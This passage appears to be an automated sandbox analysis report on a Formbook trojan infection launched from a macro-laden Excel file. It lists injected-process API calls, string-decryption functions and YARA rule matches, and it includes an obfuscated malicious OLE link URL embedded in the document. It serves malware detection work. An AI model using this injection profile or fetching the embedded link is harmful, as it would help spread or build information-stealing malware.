Source: C:\Windows\explorer.exe Code function: 23_2_0610CE0A NtProtectVirtualMemory, 23_2_0610CE0A
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 27_2_021E00C4 NtCreateFile,LdrInitializeThunk, 27_2_021E00C4
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 27_2_021E07AC NtCreateMutant,LdrInitializeThunk, 27_2_021E07AC
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 27_2_021DFAB8 NtQueryValueKey,LdrInitializeThunk, 27_2_021DFAB8
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 27_2_021DFAD0 NtAllocateVirtualMemory,LdrInitializeThunk, 27_2_021DFAD0
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 27_2_021DFAE8 NtQueryInformationProcess,LdrInitializeThunk, 27_2_021DFAE8
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 27_2_021DFB50 NtCreateKey,LdrInitializeThunk, 27_2_021DFB50
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 27_2_021DFB68 NtFreeVirtualMemory,LdrInitializeThunk, 27_2_021DFB68
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 27_2_021DFBB8 NtQueryInformationToken,LdrInitializeThunk, 27_2_021DFBB8
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 27_2_021DF900 NtReadFile,LdrInitializeThunk, 27_2_021DF900
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 27_2_021DF9F0 NtClose,LdrInitializeThunk, 27_2_021DF9F0
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 27_2_021DFED0 NtAdjustPrivilegesToken,LdrInitializeThunk, 27_2_021DFED0
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 27_2_021DFFB4 NtCreateSection,LdrInitializeThunk, 27_2_021DFFB4
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 27_2_021DFC60 NtMapViewOfSection,LdrInitializeThunk, 27_2_021DFC60
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 27_2_021DFD8C NtDelayExecution,LdrInitializeThunk, 27_2_021DFD8C
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 27_2_021DFDC0 NtQuerySystemInformation,LdrInitializeThunk, 27_2_021DFDC0
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 27_2_021E0048 NtProtectVirtualMemory, 27_2_021E0048
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 27_2_021E0078 NtResumeThread, 27_2_021E0078
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 27_2_021E0060 NtQuerySection, 27_2_021E0060
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 27_2_021E10D0 NtOpenProcessToken, 27_2_021E10D0
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 27_2_021E010C NtOpenDirectoryObject, 27_2_021E010C
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 27_2_021E1148 NtOpenThread, 27_2_021E1148
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 27_2_021E01D4 NtSetValueKey, 27_2_021E01D4
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 27_2_021DFA20 NtQueryInformationFile, 27_2_021DFA20
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 27_2_021DFA50 NtEnumerateValueKey, 27_2_021DFA50
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 27_2_021DFBE8 NtQueryVirtualMemory, 27_2_021DFBE8
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 27_2_021DF8CC NtWaitForSingleObject, 27_2_021DF8CC
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 27_2_021DF938 NtWriteFile, 27_2_021DF938
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 27_2_021E1930 NtSetContextThread, 27_2_021E1930
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 27_2_021DFE24 NtWriteVirtualMemory, 27_2_021DFE24
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 27_2_021DFEA0 NtReadVirtualMemory, 27_2_021DFEA0
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 27_2_021DFF34 NtQueueApcThread, 27_2_021DFF34
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 27_2_021DFFFC NtCreateProcessEx, 27_2_021DFFFC
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 27_2_021DFC30 NtOpenProcess, 27_2_021DFC30
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 27_2_021DFC48 NtSetInformationFile, 27_2_021DFC48
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 27_2_021E0C40 NtGetContextThread, 27_2_021E0C40
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 27_2_021DFC90 NtUnmapViewOfSection, 27_2_021DFC90
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 27_2_021DFD5C NtEnumerateKey, 27_2_021DFD5C
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 27_2_021E1D80 NtSuspendThread, 27_2_021E1D80
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 27_2_0009A330 NtCreateFile, 27_2_0009A330
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 27_2_0009A3E0 NtReadFile, 27_2_0009A3E0
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 27_2_0009A460 NtClose, 27_2_0009A460
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 27_2_0009A510 NtAllocateVirtualMemory, 27_2_0009A510
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 27_2_0009A50A NtAllocateVirtualMemory, 27_2_0009A50A
Detected potential crypto function
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe Code function: 17_2_002504BC 17_2_002504BC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe Code function: 17_2_002594EF 17_2_002594EF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe Code function: 17_2_002548A8 17_2_002548A8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe Code function: 17_2_0025C0F8 17_2_0025C0F8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe Code function: 17_2_00251168 17_2_00251168
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe Code function: 17_2_002551D8 17_2_002551D8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe Code function: 17_2_0025D288 17_2_0025D288
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe Code function: 17_2_0025C530 17_2_0025C530
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe Code function: 17_2_0025C959 17_2_0025C959
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe Code function: 17_2_00257A70 17_2_00257A70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe Code function: 17_2_00253C78 17_2_00253C78
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe Code function: 17_2_0025CDA0 17_2_0025CDA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe Code function: 22_2_009FE0C6 22_2_009FE0C6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe Code function: 22_2_009FE2E9 22_2_009FE2E9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe Code function: 22_2_00AA63BF 22_2_00AA63BF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe Code function: 22_2_00A263DB 22_2_00A263DB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe Code function: 22_2_00A02305 22_2_00A02305
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe Code function: 22_2_00A4A37B 22_2_00A4A37B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe Code function: 22_2_00A8443E 22_2_00A8443E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe Code function: 22_2_00A805E3 22_2_00A805E3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe Code function: 22_2_00A1C5F0 22_2_00A1C5F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe Code function: 22_2_00A46540 22_2_00A46540
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe Code function: 22_2_00A04680 22_2_00A04680
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe Code function: 22_2_00A0E6C1 22_2_00A0E6C1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe Code function: 22_2_00AA2622 22_2_00AA2622
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe Code function: 22_2_00A4A634 22_2_00A4A634
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe Code function: 22_2_00A0C7BC 22_2_00A0C7BC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe Code function: 22_2_00A2286D 22_2_00A2286D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe Code function: 22_2_00A0C85C 22_2_00A0C85C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe Code function: 22_2_00A029B2 22_2_00A029B2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe Code function: 22_2_00AA098E 22_2_00AA098E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe Code function: 22_2_00A949F5 22_2_00A949F5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe Code function: 22_2_00A169FE 22_2_00A169FE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe Code function: 22_2_00A4C920 22_2_00A4C920
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe Code function: 22_2_00AACBA4 22_2_00AACBA4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe Code function: 22_2_00A86BCB 22_2_00A86BCB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe Code function: 22_2_00AA2C9C 22_2_00AA2C9C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe Code function: 22_2_00A8AC5E 22_2_00A8AC5E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe Code function: 22_2_00A30D3B 22_2_00A30D3B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe Code function: 22_2_00A0CD5B 22_2_00A0CD5B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe Code function: 22_2_00A32E2F 22_2_00A32E2F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe Code function: 22_2_00A1EE4C 22_2_00A1EE4C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe Code function: 22_2_00A9CFB1 22_2_00A9CFB1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe Code function: 22_2_00A72FDC 22_2_00A72FDC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe Code function: 22_2_00A10F3F 22_2_00A10F3F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe Code function: 22_2_00A2D005 22_2_00A2D005
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe Code function: 22_2_00A7D06D 22_2_00A7D06D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe Code function: 22_2_00A03040 22_2_00A03040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe Code function: 22_2_00A1905A 22_2_00A1905A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe Code function: 22_2_00A8D13F 22_2_00A8D13F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe Code function: 22_2_00AA1238 22_2_00AA1238
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe Code function: 22_2_009FF3CF 22_2_009FF3CF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe Code function: 22_2_00A07353 22_2_00A07353
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe Code function: 22_2_00A35485 22_2_00A35485
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe Code function: 22_2_00A11489 22_2_00A11489
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe Code function: 22_2_00A3D47D 22_2_00A3D47D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe Code function: 22_2_00AA35DA 22_2_00AA35DA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe Code function: 22_2_00A0351F 22_2_00A0351F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe Code function: 22_2_00A8579A 22_2_00A8579A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe Code function: 22_2_00A357C3 22_2_00A357C3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe Code function: 22_2_00A9771D 22_2_00A9771D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe Code function: 22_2_00A9F8EE 22_2_00A9F8EE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe Code function: 22_2_00A7F8C4 22_2_00A7F8C4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe Code function: 22_2_00A8394B 22_2_00A8394B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe Code function: 22_2_00A85955 22_2_00A85955
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe Code function: 22_2_00AB3A83 22_2_00AB3A83
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe Code function: 22_2_009FFBD7 22_2_009FFBD7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe Code function: 22_2_00A8DBDA 22_2_00A8DBDA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe Code function: 22_2_00A27B00 22_2_00A27B00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe Code function: 22_2_00A9FDDD 22_2_00A9FDDD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe Code function: 22_2_00A8BF14 22_2_00A8BF14
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe Code function: 22_2_00A2DF7C 22_2_00A2DF7C
Source: C:\Windows\explorer.exe Code function: 23_2_02825232 23_2_02825232
Source: C:\Windows\explorer.exe Code function: 23_2_0281FB30 23_2_0281FB30
Source: C:\Windows\explorer.exe Code function: 23_2_0281FB32 23_2_0281FB32
Source: C:\Windows\explorer.exe Code function: 23_2_0281B082 23_2_0281B082
Source: C:\Windows\explorer.exe Code function: 23_2_02824036 23_2_02824036
Source: C:\Windows\explorer.exe Code function: 23_2_028285CD 23_2_028285CD
Source: C:\Windows\explorer.exe Code function: 23_2_0281CD02 23_2_0281CD02
Source: C:\Windows\explorer.exe Code function: 23_2_02822912 23_2_02822912
Source: C:\Windows\explorer.exe Code function: 23_2_05FC55CD 23_2_05FC55CD
Source: C:\Windows\explorer.exe Code function: 23_2_05FBF912 23_2_05FBF912
Source: C:\Windows\explorer.exe Code function: 23_2_05FB9D02 23_2_05FB9D02
Source: C:\Windows\explorer.exe Code function: 23_2_05FB8082 23_2_05FB8082
Source: C:\Windows\explorer.exe Code function: 23_2_05FC1036 23_2_05FC1036
Source: C:\Windows\explorer.exe Code function: 23_2_05FBCB32 23_2_05FBCB32
Source: C:\Windows\explorer.exe Code function: 23_2_05FBCB30 23_2_05FBCB30
Source: C:\Windows\explorer.exe Code function: 23_2_05FC2232 23_2_05FC2232
Source: C:\Windows\explorer.exe Code function: 23_2_0610B232 23_2_0610B232
Source: C:\Windows\explorer.exe Code function: 23_2_0610A036 23_2_0610A036
Source: C:\Windows\explorer.exe Code function: 23_2_06101082 23_2_06101082
Source: C:\Windows\explorer.exe Code function: 23_2_06108912 23_2_06108912
Source: C:\Windows\explorer.exe Code function: 23_2_06102D02 23_2_06102D02
Source: C:\Windows\explorer.exe Code function: 23_2_06105B30 23_2_06105B30
Source: C:\Windows\explorer.exe Code function: 23_2_06105B32 23_2_06105B32
Source: C:\Windows\explorer.exe Code function: 23_2_0610E5CD 23_2_0610E5CD
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 27_2_0091884E 27_2_0091884E
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 27_2_008EC869 27_2_008EC869
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 27_2_00934908 27_2_00934908
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 27_2_008E2152 27_2_008E2152
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 27_2_0090DA85 27_2_0090DA85
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 27_2_0090E2AE 27_2_0090E2AE
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 27_2_00929506 27_2_00929506
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 27_2_00908741 27_2_00908741
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 27_2_02291238 27_2_02291238
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 27_2_021EE2E9 27_2_021EE2E9
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 27_2_021F2305 27_2_021F2305
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 27_2_021F7353 27_2_021F7353
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 27_2_0223A37B 27_2_0223A37B
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 27_2_022963BF 27_2_022963BF
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 27_2_021EF3CF 27_2_021EF3CF
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 27_2_022163DB 27_2_022163DB
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 27_2_0221D005 27_2_0221D005
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 27_2_0226D06D 27_2_0226D06D
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 27_2_021F3040 27_2_021F3040
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 27_2_0220905A 27_2_0220905A
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 27_2_021EE0C6 27_2_021EE0C6
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 27_2_0227D13F 27_2_0227D13F
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 27_2_02292622 27_2_02292622
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 27_2_0223A634 27_2_0223A634
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 27_2_021F4680 27_2_021F4680
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 27_2_021FE6C1 27_2_021FE6C1
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 27_2_0228771D 27_2_0228771D
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 27_2_021FC7BC 27_2_021FC7BC
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 27_2_0227579A 27_2_0227579A
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 27_2_022257C3 27_2_022257C3
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 27_2_0227443E 27_2_0227443E
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 27_2_0222D47D 27_2_0222D47D
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 27_2_02225485 27_2_02225485
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 27_2_02201489 27_2_02201489
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 27_2_021F351F 27_2_021F351F
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 27_2_02236540 27_2_02236540
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 27_2_022705E3 27_2_022705E3
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 27_2_0220C5F0 27_2_0220C5F0
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 27_2_022935DA 27_2_022935DA
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 27_2_022A3A83 27_2_022A3A83
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 27_2_02217B00 27_2_02217B00
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 27_2_0229CBA4 27_2_0229CBA4
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 27_2_021EFBD7 27_2_021EFBD7
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 27_2_02276BCB 27_2_02276BCB
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 27_2_0227DBDA 27_2_0227DBDA
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 27_2_021FC85C 27_2_021FC85C
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 27_2_0221286D 27_2_0221286D
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 27_2_0228F8EE 27_2_0228F8EE
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 27_2_0226F8C4 27_2_0226F8C4
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 27_2_0223C920 27_2_0223C920
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 27_2_0227394B 27_2_0227394B
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 27_2_02275955 27_2_02275955
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 27_2_0229098E 27_2_0229098E
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 27_2_021F29B2 27_2_021F29B2
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 27_2_022849F5 27_2_022849F5
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 27_2_022069FE 27_2_022069FE
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 27_2_02222E2F 27_2_02222E2F
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 27_2_0220EE4C 27_2_0220EE4C
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 27_2_02200F3F 27_2_02200F3F
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 27_2_0227BF14 27_2_0227BF14
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 27_2_0221DF7C 27_2_0221DF7C
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 27_2_0228CFB1 27_2_0228CFB1
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 27_2_02262FDC 27_2_02262FDC
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 27_2_0227AC5E 27_2_0227AC5E
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 27_2_02292C9C 27_2_02292C9C
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 27_2_02220D3B 27_2_02220D3B
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 27_2_021FCD5B 27_2_021FCD5B
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 27_2_0228FDDD 27_2_0228FDDD
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 27_2_0009E5FA 27_2_0009E5FA
Document contains embedded VBA macros
Source: PO.78NO9.xls OLE indicator, VBA macros: true
Source: tmpB50D.tmp.17.dr OLE indicator, VBA macros: true
Document embeds suspicious OLE2 link
Source: PO.78NO9.xls Stream path 'MBD008EDE53/\x1Ole' : https://m2g.me/a080Pit1!6E&`)o+fOh%;mj_.MLqr5/|P]OTX1I%(`>)>BX:aTEKzMVWH1E5LnNyCTZOKCR4gXGSPwAk5Ik680AmQaH1DIcL7DuD03UG6NujfTyTbtLSN1xOl3MpLXj0YOPGd7pSSLdhzgrzoI8UEaN7qwoGLsYr65ptx8lokRphZeo9DmUmfmWYym1C6NGRAZtjzKDRiqrOtFTYBXfBtByFIJO6chqWyFS07iPFmw8vi2wrmCzAFA?~^z_mv`>?U%
Document misses a certain OLE stream usually present in this Microsoft Office document type
Source: ~WRF{71025B50-9EA6-4B02-92C0-2B9E7555DC6C}.tmp.4.dr OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Source: tmpB50D.tmp.17.dr OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Found potential string decryption / allocating functions
Source: C:\Windows\SysWOW64\mstsc.exe Code function: String function: 00934E47 appears 128 times
Source: C:\Windows\SysWOW64\mstsc.exe Code function: String function: 02233F92 appears 132 times
Source: C:\Windows\SysWOW64\mstsc.exe Code function: String function: 0223373B appears 253 times
Source: C:\Windows\SysWOW64\mstsc.exe Code function: String function: 0225F970 appears 84 times
Source: C:\Windows\SysWOW64\mstsc.exe Code function: String function: 021EE2A8 appears 60 times
Source: C:\Windows\SysWOW64\mstsc.exe Code function: String function: 008E1040 appears 587 times
Source: C:\Windows\SysWOW64\mstsc.exe Code function: String function: 021EDF5C appears 130 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe Code function: String function: 00A6F970 appears 84 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe Code function: String function: 00A43F92 appears 132 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe Code function: String function: 00A4373B appears 253 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe Code function: String function: 009FE2A8 appears 60 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe Code function: String function: 009FDF5C appears 137 times
Yara signature match
Source: 0000001B.00000002.637430242.0000000000080000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000001B.00000002.637430242.0000000000080000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000001B.00000002.637430242.0000000000080000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000001B.00000002.637544486.0000000000310000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000001B.00000002.637544486.0000000000310000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000001B.00000002.637544486.0000000000310000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000016.00000002.511155982.0000000000330000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
